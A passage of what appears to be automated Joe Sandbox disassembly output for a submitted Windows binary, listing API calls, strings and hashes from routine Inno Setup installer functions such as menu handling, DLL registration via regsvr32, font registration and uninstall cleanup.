                                                                                                      • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422251
                                                                                                      • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042225E
                                                                                                      • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226B
                                                                                                      • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422278
                                                                                                      • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422285
                                                                                                      • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422292
                                                                                                      • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042229F
                                                                                                      • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222BD
                                                                                                      • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Delete$EnableItem$System
                                                                                                      • String ID:
                                                                                                      • API String ID: 3985193851-0
                                                                                                      • Opcode ID: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                                      • Instruction ID: 662ae76830c3dbb110fd6952920e185112f137d20e740dc0dcce1beff7d7cd05
                                                                                                      • Opcode Fuzzy Hash: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                                      • Instruction Fuzzy Hash: AF2144703407047AE720E724CD8BF9BBBD89B04708F5451A5BA487F6D3C6F9AB804698
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNEL32(10000000), ref: 00481A11
                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00481A25
                                                                                                      • SendNotifyMessageA.USER32(00010434,00000496,00002710,00000000), ref: 00481A97
                                                                                                      Strings
                                                                                                      • Deinitializing Setup., xrefs: 00481872
                                                                                                      • Restarting Windows., xrefs: 00481A72
                                                                                                      • DeinitializeSetup, xrefs: 0048190D
                                                                                                      • Not restarting Windows because Setup is being run from the debugger., xrefs: 00481A46
                                                                                                      • GetCustomSetupExitCode, xrefs: 004818B1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary$MessageNotifySend
                                                                                                      • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                                      • API String ID: 3817813901-1884538726
                                                                                                      • Opcode ID: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                                      • Instruction ID: b122ee3e0244d1cffd13458a0655c780be2d4a3cdc4850abd58d30bc7702deed
                                                                                                      • Opcode Fuzzy Hash: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                                      • Instruction Fuzzy Hash: C651BF347042409FD715EB69E9A5B6E7BE8EB19314F10887BE800C72B2DB389C46CB5D
                                                                                                      APIs
                                                                                                      • SHGetMalloc.SHELL32(?), ref: 004616C7
                                                                                                      • GetActiveWindow.USER32 ref: 0046172B
                                                                                                      • CoInitialize.OLE32(00000000), ref: 0046173F
                                                                                                      • SHBrowseForFolder.SHELL32(?), ref: 00461756
                                                                                                      • CoUninitialize.OLE32(00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046176B
                                                                                                      • SetActiveWindow.USER32(?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 00461781
                                                                                                      • SetActiveWindow.USER32(?,?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046178A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                                                      • String ID: A
                                                                                                      • API String ID: 2684663990-3554254475
                                                                                                      • Opcode ID: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                                      • Instruction ID: 0f37cca2ee7d5c89cd5c8fe3b5c5f67eac08b275376d6c087401a1ac056189be
                                                                                                      • Opcode Fuzzy Hash: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                                      • Instruction Fuzzy Hash: C3312F70E00348AFDB10EFA6D885A9EBBF8EB09304F55847AF404E7251E7785A048F59
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNEL32(00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15,?,?,00000000,00472F84), ref: 00472A1C
                                                                                                        • Part of subcall function 0042CD94: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE0A
                                                                                                        • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15), ref: 00472A93
                                                                                                      • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000), ref: 00472A99
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                                      • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                                      • API String ID: 884541143-1710247218
                                                                                                      • Opcode ID: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                                                                      • Instruction ID: 1765d5ebfc4e6887f49e3816ac39c9d5a3c16910e93b0aec031ce55b1572895b
                                                                                                      • Opcode Fuzzy Hash: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                                                                      • Instruction Fuzzy Hash: 6711B2707005147BD721EAAA8D82B9F73ACDB49714F61C17BB404B72C2DBBCAE01861C
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D2BD
                                                                                                      • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D2CD
                                                                                                      • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D2DD
                                                                                                      • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D2ED
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                                      • API String ID: 190572456-3516654456
                                                                                                      • Opcode ID: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                                      • Instruction ID: d913f85fec6517a53d2ec7ba369195fd603025f4bffd93910817278a70f0814a
                                                                                                      • Opcode Fuzzy Hash: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                                      • Instruction Fuzzy Hash: C20112B0D00701DBE724DFF6ACC672636A5ABA8306F14C03B9D09962A2D77D0459DF2E
                                                                                                      APIs
                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0041A9B9
                                                                                                      • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041A9F3
                                                                                                      • SetBkColor.GDI32(?,?), ref: 0041AA08
                                                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA52
                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0041AA5D
                                                                                                      • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA6D
                                                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAAC
                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0041AAB6
                                                                                                      • SetBkColor.GDI32(00000000,?), ref: 0041AAC3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$StretchText
                                                                                                      • String ID:
                                                                                                      • API String ID: 2984075790-0
                                                                                                      • Opcode ID: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                                      • Instruction ID: 4467ea82dd13d464879b0bd0dd0607b47ee3045dce17e21d2c6451b7f26a8ea4
                                                                                                      • Opcode Fuzzy Hash: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                                      • Instruction Fuzzy Hash: 8761E5B5A00505AFCB40EFADD985E9AB7F8EF08314B10816AF908DB262C775ED40CF58
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                      • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458278,?, /s ",?,regsvr32.exe",?,00458278), ref: 004581EA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseDirectoryHandleSystem
                                                                                                      • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                                      • API String ID: 2051275411-1862435767
                                                                                                      • Opcode ID: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                                      • Instruction ID: cda81b302c56d3c3b7af3d8ffa4af26d40175ae7a7c1cff7e24eee752c39b11a
                                                                                                      • Opcode Fuzzy Hash: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                                      • Instruction Fuzzy Hash: 21411670A047486BDB10EFD6D842B8DBBF9AF45305F50407FB904BB292DF789A098B19
                                                                                                      APIs
                                                                                                      • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A9
                                                                                                      • GetSysColor.USER32(00000014), ref: 0044D1B0
                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C8
                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1F1
                                                                                                      • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1FB
                                                                                                      • GetSysColor.USER32(00000010), ref: 0044D202
                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0044D21A
                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D243
                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D26E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Text$Color$Draw$OffsetRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 1005981011-0
                                                                                                      • Opcode ID: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                                      • Instruction ID: 8406a00effd73db105afccad7da3796984cf264811f0ddac3e5cace4e0ac1d2b
                                                                                                      • Opcode Fuzzy Hash: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                                      • Instruction Fuzzy Hash: A021BDB42015047FC710FB2ACD8AE8B6BDCDF19319B05457AB958EB292C67CDD404668
                                                                                                      APIs
                                                                                                      • GetFocus.USER32 ref: 0041B745
                                                                                                      • GetDC.USER32(?), ref: 0041B751
                                                                                                      • SelectPalette.GDI32(00000000,?,00000000), ref: 0041B786
                                                                                                      • RealizePalette.GDI32(00000000), ref: 0041B792
                                                                                                      • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7C0
                                                                                                      • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B7F4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                                      • String ID: %H
                                                                                                      • API String ID: 3275473261-1959103961
                                                                                                      • Opcode ID: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                                      • Instruction ID: 38bdddf8d72f5571b31e8017bfcff87152bbfcb95d4f6cd7f9962c0a723fddb9
                                                                                                      • Opcode Fuzzy Hash: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                                      • Instruction Fuzzy Hash: 8A512F70A002099FDF11DFA9C881AEEBBF9FF49704F104066F504A7791D7799981CBA9
                                                                                                      APIs
                                                                                                      • GetFocus.USER32 ref: 0041BA17
                                                                                                      • GetDC.USER32(?), ref: 0041BA23
                                                                                                      • SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA5D
                                                                                                      • RealizePalette.GDI32(00000000), ref: 0041BA69
                                                                                                      • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA8D
                                                                                                      • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAC1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                                      • String ID: %H
                                                                                                      • API String ID: 3275473261-1959103961
                                                                                                      • Opcode ID: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                                      • Instruction ID: 3fcaffe560058c7771eaec6053d79e0e1924f360d52694d27862de55114c0f48
                                                                                                      • Opcode Fuzzy Hash: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                                      • Instruction Fuzzy Hash: 9D512A74A002189FDB11DFA9C891AAEBBF9FF49700F154066F904EB751D738AD40CBA4
                                                                                                      APIs
                                                                                                        • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                        • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 00496585
                                                                                                      • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496599
                                                                                                      • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004965B3
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965BF
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965C5
                                                                                                      • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965D8
                                                                                                      Strings
                                                                                                      • Deleting Uninstall data files., xrefs: 004964FB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                                      • String ID: Deleting Uninstall data files.
                                                                                                      • API String ID: 1570157960-2568741658
                                                                                                      • Opcode ID: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                                      • Instruction ID: caddedc05ae4add9971b90b84c259ce0cd5246952d50e779d54ebc968ffbf915
                                                                                                      • Opcode Fuzzy Hash: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                                      • Instruction Fuzzy Hash: 73216170204250BFEB10EB6ABC82B2637A8DB54728F53453BB501961D6DA7CAC448A6D
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9,?,?,?,?,00000000), ref: 00470263
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9), ref: 0047027A
                                                                                                      • AddFontResourceA.GDI32(00000000), ref: 00470297
                                                                                                      • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004702AB
                                                                                                      Strings
                                                                                                      • Failed to set value in Fonts registry key., xrefs: 0047026C
                                                                                                      • AddFontResource, xrefs: 004702B5
                                                                                                      • Failed to open Fonts registry key., xrefs: 00470281
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                                      • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                                      • API String ID: 955540645-649663873
                                                                                                      • Opcode ID: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                                      • Instruction ID: 122e39bb1ea2b43e4c2a7da55aa69ddad999e5e54c07bca5f4119535fc7344d3
                                                                                                      • Opcode Fuzzy Hash: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                                      • Instruction Fuzzy Hash: 6921E271741204BBDB10EAA68C46FAE67AC9B14704F208477B904EB3C3DA7C9E01866D
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416410: GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                                        • Part of subcall function 00416410: UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                                        • Part of subcall function 00416410: RegisterClassA.USER32(?), ref: 004164CE
                                                                                                      • GetVersion.KERNEL32 ref: 00462E60
                                                                                                      • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462E9E
                                                                                                      • SHGetFileInfo.SHELL32(00462F3C,00000000,?,00000160,00004011), ref: 00462EBB
                                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 00462ED9
                                                                                                      • SetCursor.USER32(00000000,00000000,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462EDF
                                                                                                      • SetCursor.USER32(?,00462F1F,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462F12
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
